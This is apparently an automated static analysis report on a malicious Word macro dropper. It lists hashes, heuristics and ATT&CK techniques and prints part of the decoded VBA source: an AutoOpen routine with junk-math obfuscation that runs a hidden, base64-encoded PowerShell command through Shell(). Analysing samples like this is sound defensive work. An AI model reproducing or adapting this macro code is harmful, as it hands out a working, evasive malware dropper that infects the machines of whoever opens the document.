Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 563dd537196cfeee…

MALICIOUS

Office (OLE)

Size: 100.2 KB
Created: 2018-05-30 22:15:00
Authoring application: Microsoft Office Word
First seen: 2018-06-19
MD5: 2a5587bc1105ee48557c854f49c4f24e
SHA-1: b08bbefafe6ed22536317102442ebf8165acb10a
SHA-256: 563dd537196cfeee5560e51f7ee9b0fc067062cb5a3dfb2dc0a967f77b31bd99
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The file contains a VBA macro with an AutoOpen function that uses the Shell() function to execute a command. The command is obfuscated but appears to be designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6566155-0' further supports its role as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6566155-0 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6566155-0
  • VBA macros detected [medium] [OLE_VBA_MACROS] (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] [OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high] [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14557 bytes
SHA-256: f21a0da8649ec65c95cb62463d7a7f50325131c62b589e9cf94e558830e2a35e

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "CbAHRLOAqXtR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function MHGiEXaui()
On Error Resume Next
wIRji = Atn(37740 * CInt(73158) + 96065 - 93435)
Qftjiw = 39277 + _
Log(78244) - IqrvOr / Atn(51421) / mVYTaE / vNqRsU
BjMmp = Atn(81232 * CInt(33328) + 1737 - 41621)
WWqXH = 25533 + _
Log(5970) - DlzcYS / Atn(80080) / wkQHDv / CoHjc
MHGiEXaui = aivpfpVN + sAYZOBAJ + rXKjVGFm + VQfGrsd + MtZlf + qWsutsHL
kRlzV = Atn(94033 * CInt(7383) + 27457 - 46860)
AncojG = 48500 + _
Log(21511) - wOrjkO / Atn(99062) / Poizda / TTNdCV
End Function
Sub Autoopen()
On Error Resume Next
MawQTa = Atn(13457 * CInt(46355) + 90618 - 29132)
pfnskB = 72044 + _
Log(42649) - oapoW / Atn(25386) / VPtwIY / BRjTu
naLwZj (MHGiEXaui)
TrsTD = Atn(77205 * CInt(90385) + 99728 - 51112)
Mrjzzm = 69815 + _
Log(15496) - GmlIBT / Atn(76874) / UmaAh / zCwhWl
End Sub
Function naLwZj(WJVNAKI)
On Error Resume Next
SovjhE = Atn(54029 * CInt(48357) + 25427 - 28077)
bZomii = 83104 + _
Log(917) - WaNzh / Atn(58625) / iwBFO / Lozpc
ptqKJE = uTdakzPkNi + Chr(vbKeyP) + Fhhzfs
OLsHX = Atn(86952 * CInt(48313) + 15086 - 5463)
UNqVV = 22219 + _
Log(84558) - vwCDtd / Atn(23090) / TFNzp / GWlDiS
SclwonVzA = caMzQ + Shell(GrfHwihM + ptqKJE + PjTOf + WJVNAKI + OwfqcCwipF, vbHide)
GIWzXb = Atn(76030 * CInt(29687) + 85381 - 1694)
wVuiR = 20859 + _
Log(35967) - vOZUt / Atn(5688) / cHTjS / ZlopjF
End Function
Attribute VB_Name = "BYtbENDTzc"
Function aivpfpVN()
On Error Resume Next
bOsmYP = Atn(29626 * CInt(67413) + 1774 - 88191)
MkDYu = 57242 + _
Log(86155) - lkZuXt / Atn(60411) / YsihE / zPWJh
uicQzzXTR = "owersHeLL " + "-WinDowsTyle hi" + "dden -e" + " IAAmACAAKAAgAC" + "QAUwBIAEUA" + "TABsAGkA" + "RABbADE" + "AXQArACQAcwBIAG" + "UATABsAG"
VYiMjb = Atn(53455 * CInt(34953) + 67634 - 11059)
fqvOL = 2964 + _
Log(39573) - ttOqq / Atn(36086) / PzknC / wFZNCM
vDzEXZ = "kAZABbADEAM" + "wBdACs" + "AJwB4ACc" + "AKQAoACgAKAAiAH"
wRNRT = Atn(71873 * CInt(4784) + 82219 - 17427)
oOBnou = 11730 + _
Log(64748) - uTLchv / Atn(6928) / jlVAJ / GYbfzX
aqsswn = "sANwA" + "0AH0Aew" + "A3ADI" + "AfQB7ADYAMgB9AH" + "sANAAwAH" + "0AewAyADA" + "AfQB7ADgA" + "MAB9AHsAN" + "AA5AH0AewA1AD" + "kAfQB7ADEANQB9"
QVGzv = Atn(49581 * CInt(1166) + 93960 - 16514)
TfJSt = 70070 + _
Log(78783) - WPOTFn / Atn(97299) / ZuPMOI / ndwFc
aEmIGYoiPir = "AHsAMwAwAH0Aew" + "A1ADc" + "AfQB7ADgAN" + "wB9AHsA"
VCZaaB = Atn(40509 * CInt(98537) + 42434 - 24584)
mzbIqw = 31076 + _
Log(36275) - QAFhv / Atn(93917) / VWovi / uAMpt
hjubpQpW = "MwA1AH0Aew" + "A3ADMAfQB7AD" + "IANgB9AHsAN" + "gA5AH0A" + "ewAxAD" + "QAfQB7ADEAMQ" + "B9AHsANQ" + "AzAH0AewA0ADUAf"
ldjDia = Atn(50164 * CInt(27793) + 63838 - 4140)
himbVV = 94728 + _
Log(84466) - dqzchR / Atn(18767) / FavBDk / XjzXHV
UrjXDLVW = "QB7ADgANQB9A" + "HsANQAwAH" + "0AewAyADgAfQB" + "7ADEAOAB9AHsAN" + "gAwAH0AewAzADYA" + "fQB7ADEANwB9" + "AHsANQAyAH0" + "AewA2ADUAfQB7AD" + "cAOAB9A" + "HsANgAzAH0AewA"
iTZHNr = Atn(70594 * CInt(49109) + 60553 - 29281)
OBuiDV = 32168 + _
Log(32266) - JGGwdz / Atn(10495) / lYZkI / MjDZER
ZmwbPtJMViT = "1ADUAfQB7" + "ADkAfQB7ADM" + "AMQB9AHsA" + "NwA1AH0Aew" + "A4ADgAfQB" + "7ADEAOQ"
fvjDpj = Atn(73986 * CInt(87757) + 60972 - 52103)
qWZXM = 55594 + _
Log(58221) - mjnHp / Atn(23986) / GiwAw / wKdLa
BLLjFE = "B9AHsAMQA" + "2AH0AewAxADAA" + "fQB7ADgANAB9A" + "HsAMAB9AHsANwA2" + "AH0AewAyADMAf" + "QB7AD"
oOSKFw = Atn(35918 * CInt(88680) + 73899 - 41925)
TavofI = 84252 + _
Log(76620) - rjcEvf / Atn(59171) / rLvMmk / BTWhKW
mjEGMWWKkv = "cAfQB7ADY" + "ANAB9AHsAOAA2AH" + "0AewAxADMAfQB7A" + "DMANA" + "B9AHsAMgB9AHs"
TltiZ = Atn(1786 * CInt(46125) + 37633 - 2901)
XjAFlO = 28043 + _
Log(50606) - YCaac / Atn(62857) / FmLmJd / ZPrKQ
fOBvMj = "ANAAzAH0" + "AewA0ADgAfQB7" + "ADEAMgB9A" + "HsANQA2AH0AewA3" + "ADAAfQB7ADg" + "AMwB9AHsANgA" + "4AH0Ae" + "wA3ADkAfQB7"
... (truncated)